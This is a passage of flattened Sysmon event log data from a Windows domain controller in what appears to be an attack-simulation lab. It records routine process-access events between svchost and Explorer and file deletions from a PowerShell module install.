Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A8BB0810E5BCDDFE99E85610D89744A9,SHA256=CF513F2EDF2333AEC6F61740BC7A652CBE406F24E2CF3AFE461EC41048890D19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:11.216{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8910606973CB2997142668112B41472C,SHA256=3F2B51607712330CC285EE02C66F5B9F26433050684F91A625A294F3AB35DE9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024306Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024305Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024304Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024303Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024302Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024301Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024300Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F48-60D3-DE00-00000000CF01}5812C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.794{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.684{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3CA108D378F5FBCCBB0422E752C6D531,SHA256=D32CA7466BBF97C6829F3E654137B6180FD763F61E86F8881B8491247BA8A8F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.653{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\816528380\powershell-yaml\powershell-yaml.nupkgMD5=E6C0341FC9AEB84E1E36BFECABBEAD48,SHA256=47F21C151775C2F0D8A21C86CEDCA3998F0BBCFD309B27977C9024F48DA9787C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024280Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.653{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Tests\powershell-yaml.Tests.ps1MD5=83E9E0680C2DCA11951CE71B71C85B06,SHA256=5D615B9C64F422D66D98C8E54DF43CC08EB1603399EC71CF661F6FA08D0A18DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024279Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.653{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\README.mdMD5=2BE6396AEBA655CD9EDD9AAA5578F149,SHA256=DF954FA2D7BFA9E029FF717A7AADD5A121649B24255B2324C1AFA5D9FF6CA8FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024278Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.653{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\powershell-yaml.psm1MD5=5F146B18BB809E5D900403AB0066D3E3,SHA256=A7D42EDEA0BD36817C750C5EA6D550274A877094C3CF0C620DFE887F8D41AFEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024277Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.637{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\powershell-yaml.psd1MD5=9BFC87E3A2D4C1B72B26A975E89A0253,SHA256=D6F3DF338AB1A2701E456EA412A28A5981A53C490E19F1CE37FBA466812088DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024276Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.637{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\powershell-yaml.nuspecMD5=AB1BDE82E3EA01840461F8CDECAF9ECE,SHA256=42ACB556A89758ABCD45DDEF1BE634BBA426CA10AA609AE4138B4A864841D24E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024275Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.637{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\Load-Assemblies.ps1MD5=5BC56753AE039CB4E6DB7D2B573D8310,SHA256=2163CEA74A5F2D9023C3343CCCC3FAF0996B72850C7A8F2E0735F707B44EE3AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024274Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.637{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\LICENSEMD5=07FFE4BACD78A3E084BD25BAFB532A71,SHA256=F9B5ED99A83F2546D2696763210BAEEE4A8F476A9BE8E69F8C32D9BD9D9516C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024273Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.637{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\YamlDotNet.xmlMD5=6FC1D7DCC2B91B4492FC2624927F2C0B,SHA256=E946653D61961FC79F3B970D7996B8F5A5566202148B8A5508B3608D602510E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024272Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:12.622{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\dk1nwwn1\lib\netstandard1.3\YamlDotNet.dllMD5=C6D295EC641BC776633AB4EDE6EEE871,SHA256=342E5362EE18BBCC1640B31F9F7040A1BDCF53C865E0976F99C4247C0F022B87,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000024271Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 